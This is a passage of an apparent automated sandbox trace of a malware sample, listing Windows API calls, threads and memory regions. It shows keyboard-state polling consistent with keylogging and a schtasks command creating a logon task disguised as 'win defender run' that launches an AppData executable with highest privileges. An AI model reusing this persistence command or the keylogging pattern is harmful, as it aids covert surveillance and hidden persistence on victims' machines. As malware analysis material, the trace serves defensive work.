returned 1 [0191.320] SetFilePointer (in: hFile=0x5e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x52cf6b0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x52cf6b0*=0) returned 0x0 [0191.321] WriteFile (in: hFile=0x5e8, lpBuffer=0x226bda8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x52cf698, lpOverlapped=0x0 | out: lpBuffer=0x226bda8*, lpNumberOfBytesWritten=0x52cf698*=0xe0, lpOverlapped=0x0) returned 1 [0191.322] CloseHandle (hObject=0x5e8) returned 1 [0191.325] GetCurrentProcess () returned 0xffffffff [0191.325] GetCurrentThread () returned 0xfffffffe [0191.325] GetCurrentProcess () returned 0xffffffff [0191.325] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x52cf78c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x52cf78c*=0x5e8) returned 1 [0191.330] GetCurrentThreadId () returned 0x129c [0191.333] GetCurrentActCtx (in: lphActCtx=0x52cf758 | out: lphActCtx=0x52cf758*=0x0) returned 1 [0191.333] ActivateActCtx (in: hActCtx=0x59d7b4, lpCookie=0x52cf768 | out: hActCtx=0x59d7b4, lpCookie=0x52cf768) returned 1 [0191.338] GetSystemMetrics (nIndex=75) returned 1 [0191.437] GetCurrentActCtx (in: lphActCtx=0x52cf630 | out: lphActCtx=0x52cf630*=0x59d7b4) returned 1 [0191.438] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0191.444] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6ffe0000 [0191.459] GetModuleHandleW (lpModuleName="user32.dll") returned 0x74790000 [0191.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x52cf4f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW+i\r_+_ «·l ù,\x05ø³a", lpUsedDefaultChar=0x0) returned 14 [0191.460] GetProcAddress (hModule=0x74790000, lpProcName="DefWindowProcW") returned 0x7797aee0 [0191.461] GetStockObject (i=5) returned 0x1900015 [0191.463] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0191.466] CoTaskMemAlloc (cb=0x5a) returned 0x5c44b8 [0191.466] RegisterClassW (lpWndClass=0x52cf4e8) returned 0xc1e3 [0191.467] CoTaskMemFree (pv=0x5c44b8) [0191.467] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0191.468] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.d6f29f_r10_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x402a6 [0191.470] SetWindowLongW (hWnd=0x402a6, nIndex=-4, dwNewLong=2006429408) returned 73991998 [0191.471] GetWindowLongW (hWnd=0x402a6, nIndex=-4) returned 2006429408 [0191.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x52ced44 | out: phkResult=0x52ced44*=0x610) returned 0x0 [0191.473] RegQueryValueExW (in: hKey=0x610, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x52ced64, lpData=0x0, lpcbData=0x52ced60*=0x0 | out: lpType=0x52ced64*=0x0, lpData=0x0, lpcbData=0x52ced60*=0x0) returned 0x2 [0191.473] RegQueryValueExW (in: hKey=0x610, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x52ced64, lpData=0x0, lpcbData=0x52ced60*=0x0 | out: lpType=0x52ced64*=0x0, lpData=0x0, lpcbData=0x52ced60*=0x0) returned 0x2 [0191.473] RegCloseKey (hKey=0x610) returned 0x0 [0191.478] SetWindowLongW (hWnd=0x402a6, nIndex=-4, dwNewLong=73992038) returned 2006429408 [0191.478] GetWindowLongW (hWnd=0x402a6, nIndex=-4) returned 73992038 [0191.479] GetWindowLongW (hWnd=0x402a6, nIndex=-16) returned 113311744 [0191.479] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc1e4 [0191.481] CallWindowProcW (lpPrevWndFunc=0x7797aee0, hWnd=0x402a6, Msg=0x24, wParam=0x0, lParam=0x52cf05c) returned 0x0 [0191.481] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1e5 [0191.481] CallWindowProcW (lpPrevWndFunc=0x7797aee0, hWnd=0x402a6, Msg=0x81, wParam=0x0, lParam=0x52cf050) returned 0x1 [0191.482] CallWindowProcW (lpPrevWndFunc=0x7797aee0, hWnd=0x402a6, Msg=0x83, wParam=0x0, lParam=0x52cf03c) returned 0x0 [0191.489] CallWindowProcW (lpPrevWndFunc=0x7797aee0, hWnd=0x402a6, Msg=0x1, wParam=0x0, lParam=0x52cf050) returned 0x0 [0191.489] GetClientRect (in: hWnd=0x402a6, lpRect=0x52ced7c | out: lpRect=0x52ced7c) returned 1 [0191.489] GetWindowRect (in: hWnd=0x402a6, lpRect=0x52ced7c | out: lpRect=0x52ced7c) returned 1 [0191.491] GetParent (hWnd=0x402a6) returned 0x0 [0191.493] OleInitialize (pvReserved=0x0) returned 0x80010106 [0191.494] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x52cf708 | out: lplpMessageFilter=0x52cf708*=0x0) returned 0x80004021 [0191.495] PeekMessageW (in: lpMsg=0x52cf6dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x52cf6dc) returned 0 [0191.496] PeekMessageW (in: lpMsg=0x52cf6dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x52cf6dc) returned 0 [0191.496] WaitMessage () returned 1 [0209.528] PeekMessageW (in: lpMsg=0x52cf6dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x52cf6dc) returned 0 [0209.947] GetKeyState (nVirtKey=17) returned 0 [0209.948] GetKeyState (nVirtKey=16) returned 0 [0209.948] GetKeyState (nVirtKey=18) returned 0 [0210.303] GetForegroundWindow () returned 0x10080 [0210.687] CoTaskMemAlloc (cb=0x804) returned 0x5b7248 [0210.687] GetWindowTextW (in: hWnd=0x10080, lpString=0x5b7248, nMaxCount=1024 | out: lpString="") returned 0 [0210.688] CoTaskMemFree (pv=0x5b7248) [0213.356] GetForegroundWindow () returned 0x2021e [0213.448] GetWindowThreadProcessId (in: hWnd=0x2021e, lpdwProcessId=0x52cf484 | out: lpdwProcessId=0x52cf484) returned 0x137c [0213.458] GetKeyboardLayout (idThread=0x137c) returned 0x4090409 [0213.666] GetKeyboardState (in: lpKeyState=0x22da074 | out: lpKeyState=0x22da074) returned 1 [0213.833] ToUnicodeEx (in: wVirtKey=0x5b, wScanCode=0x5b, lpKeyState=0x22da074, pwszBuff=0x52cf34c, cchBuff=64, wFlags=0x1, dwhkl=0x4090409 | out: pwszBuff="") returned 0 [0213.902] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x52cf5c4) returned 0x0 [0213.903] PeekMessageW (in: lpMsg=0x52cf6dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x52cf6dc) returned 0 [0213.903] WaitMessage () Thread: id = 301 os_tid = 0x12a0 [0190.480] CoGetContextToken (in: pToken=0x534febc | out: pToken=0x534febc) returned 0x0 [0190.480] IUnknown:QueryInterface (in: This=0x580220, riid=0x6cc04564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x534fee0 | out: ppvObject=0x534fee0*=0x58022c) returned 0x0 [0190.480] IComThreadingInfo:GetCurrentThreadType (in: This=0x58022c, pThreadType=0x534ff0c | out: pThreadType=0x534ff0c*=0) returned 0x0 [0190.480] IUnknown:Release (This=0x58022c) returned 0x1 [0190.481] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0190.481] RoInitialize () returned 0x1 [0190.481] RoUninitialize () returned 0x0 Thread: id = 307 os_tid = 0x1318 [0205.643] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0205.645] CoGetContextToken (in: pToken=0x54bfac4 | out: pToken=0x54bfac4) returned 0x0 [0205.646] IUnknown:QueryInterface (in: This=0x580220, riid=0x6cc04564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x54bfae8 | out: ppvObject=0x54bfae8*=0x58022c) returned 0x0 [0205.646] IComThreadingInfo:GetCurrentThreadType (in: This=0x58022c, pThreadType=0x54bfb14 | out: pThreadType=0x54bfb14*=0) returned 0x0 [0205.646] IUnknown:Release (This=0x58022c) returned 0x1 [0205.646] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0205.646] CoUninitialize () [0205.646] RoInitialize () returned 0x1 [0205.646] RoUninitialize () returned 0x0 [0205.646] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x54bf7d4 | out: UnbiasedTime=0x54bf7d4) returned 1 [0205.647] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x54bf7c4 | out: UnbiasedTime=0x54bf7c4) returned 1 [0205.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x54bf6c8 | out: lpSystemTimeAsFileTime=0x54bf6c8*(dwLowDateTime=0xbed78f8, dwHighDateTime=0x1d7b452)) [0220.776] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x54bf7d4 | out: UnbiasedTime=0x54bf7d4) returned 1 [0220.777] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x54bf7c4 | out: UnbiasedTime=0x54bf7c4) returned 1 [0220.777] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x54bf6c8 | out: lpSystemTimeAsFileTime=0x54bf6c8*(dwLowDateTime=0x14f2288b, dwHighDateTime=0x1d7b452)) Thread: id = 308 os_tid = 0x131c Thread: id = 322 os_tid = 0x1024 [0220.869] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0220.871] CoGetContextToken (in: pToken=0x5c3fa44 | out: pToken=0x5c3fa44) returned 0x0 [0220.871] IUnknown:QueryInterface (in: This=0x580220, riid=0x6cc04564*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5c3fa68 | out: ppvObject=0x5c3fa68*=0x58022c) returned 0x0 [0220.871] IComThreadingInfo:GetCurrentThreadType (in: This=0x58022c, pThreadType=0x5c3fa94 | out: pThreadType=0x5c3fa94*=0) returned 0x0 [0220.871] IUnknown:Release (This=0x58022c) returned 0x1 [0220.871] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0220.872] CoUninitialize () [0220.872] RoInitialize () returned 0x1 [0220.872] RoUninitialize () returned 0x0 Thread: id = 323 os_tid = 0xe50 Process: id = "12" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x35a6b000" os_pid = "0x1258" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x10b4" cmd_line = "\"schtasks\" /create /tn \"win defender run\" /sc ONLOGON /tr \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe\" /rl HIGHEST /f" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1783 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1784 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1785 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1786 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1787 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1788 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1789 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1790 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1791 start_va = 0x3a0000 end_va = 0x3d1fff monitored = 1 entry_point = 0x3c05b0 region_type = mapped_file name = "schtasks.exe" filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe") Region: id = 1792 start_va = 0x3e0000 end_va = 0x43dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1793 start_va = 0x4400000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1794 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1795 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1796 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1797 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1798 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 1799 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1800 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 1801 start_va = 0x2c0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1802 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1803 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1804 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1805 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1806 start_va = 0x4600000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1807 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1808 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1809 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1810 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1872 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1873 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1874 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1875 start_va = 0x1d0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1876 start_va = 0x210000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1877 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1878 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1879 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1880 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1881 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1882 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1883 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1884 start_va = 0x4600000 end_va = 0x471ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1885 start_va = 0x4780000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 1886 start_va = 0x4600000 end_va = 0x46e9fff monitored = 0 entry_point = 0x463d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1887 start_va = 0x4710000 end_va = 0x471ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 1888 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1889 start_va = 0x250000 end_va = 0x250fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1890 start_va = 0x4880000 end_va = 0x4c7afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004880000" filename = "" Region: id = 1891 start_va = 0x4c80000 end_va = 0x4fb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1892 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1893 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1894 start_va = 0x75860000 end_va = 0x758e3fff monitored = 0 entry_point = 0x75886220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1895 start_va = 0x270000 end_va = 0x270fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1896 start_va = 0x681d0000 end_va = 0x6825bfff monitored = 0 entry_point = 0x6820a6c0 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 1897 start_va = 0x6d3c0000 end_va = 0x6d3ecfff monitored = 0 entry_point = 0x6d3d2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Thread: id = 144 os_tid = 0x1260 [0189.097] GetModuleHandleA (lpModuleName=0x0) returned 0x3a0000 [0189.099] __set_app_type (_Type=0x1) [0189.099] __p__fmode () returned 0x75734d6c [0189.099] __p__commode () returned 0x75735b1c [0189.099] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3c0840) returned 0x0 [0189.099] __wgetmainargs (in: _Argc=0x3cade0, _Argv=0x3cade4, _Env=0x3cade8, _DoWildCard=0, _StartInfo=0x3cadf4 | out: _Argc=0x3cade0, _Argv=0x3cade4, _Env=0x3cade8) returned 0 [0189.100] _onexit (_Func=0x3c2bc0) returned 0x3c2bc0 [0189.100] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0189.100] WinSqmIsOptedIn () returned 0x0 [0189.101] GetProcessHeap () returned 0x4780000 [0189.101] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x4787398 [0189.101] RtlRestoreLastWin32Error () returned 0x0 [0189.101] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0189.101] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0189.101] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0189.101] RtlVerifyVersionInfo (VersionInfo=0xdf9f8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0189.101] GetProcessHeap () returned 0x4780000 [0189.101] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x4787410 [0189.101] lstrlenW (lpString="") returned 0 [0189.102] GetProcessHeap () returned 0x4780000 [0189.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x2) returned 0x4780598 [0189.102] GetProcessHeap () returned 0x4780000 [0189.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4786e50 [0189.102] GetProcessHeap () returned 0x4780000 [0189.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x47874e8 [0189.102] GetProcessHeap () returned 0x4780000 [0189.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4786c18 [0189.102] GetProcessHeap () returned 0x4780000 [0189.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4786c38 [0189.102] GetProcessHeap () returned 0x4780000 [0189.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4786c58 [0189.102] GetProcessHeap () returned 0x4780000 [0189.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4786848 [0189.102] GetProcessHeap () returned 0x4780000 [0189.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x47873c8 [0189.102] GetProcessHeap () returned 0x4780000 [0189.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4786868 [0189.102] GetProcessHeap () returned 0x4780000 [0189.102] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4786888 [0189.103] GetProcessHeap () returned 0x4780000 [0189.103] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47865e0 [0189.103] GetProcessHeap () returned 0x4780000 [0189.103] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4786600 [0189.103] GetProcessHeap () returned 0x4780000 [0189.103] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x4787428 [0189.104] GetProcessHeap () returned 0x4780000 [0189.104] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4786620 [0189.104] GetProcessHeap () returned 0x4780000 [0189.104] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4782788 [0189.104] GetProcessHeap () returned 0x4780000 [0189.104] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47827a8 [0189.104] GetProcessHeap () returned 0x4780000 [0189.104] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47827c8 [0189.104] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.113] RtlRestoreLastWin32Error () returned 0x0 [0189.113] GetProcessHeap () returned 0x4780000 [0189.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47896f0 [0189.114] GetProcessHeap () returned 0x4780000 [0189.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47894b0 [0189.114] GetProcessHeap () returned 0x4780000 [0189.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47896d0 [0189.114] GetProcessHeap () returned 0x4780000 [0189.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789510 [0189.114] GetProcessHeap () returned 0x4780000 [0189.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789390 [0189.114] GetProcessHeap () returned 0x4780000 [0189.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x47873e0 [0189.114] _memicmp (_Buf1=0x47873e0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.114] GetProcessHeap () returned 0x4780000 [0189.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x208) returned 0x4788ce8 [0189.114] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4788ce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0189.114] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdfb04 | out: lpdwHandle=0xdfb04) returned 0x76c [0189.117] GetProcessHeap () returned 0x4780000 [0189.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x776) returned 0x4789dc0 [0189.118] GetFileVersionInfoExW (in: 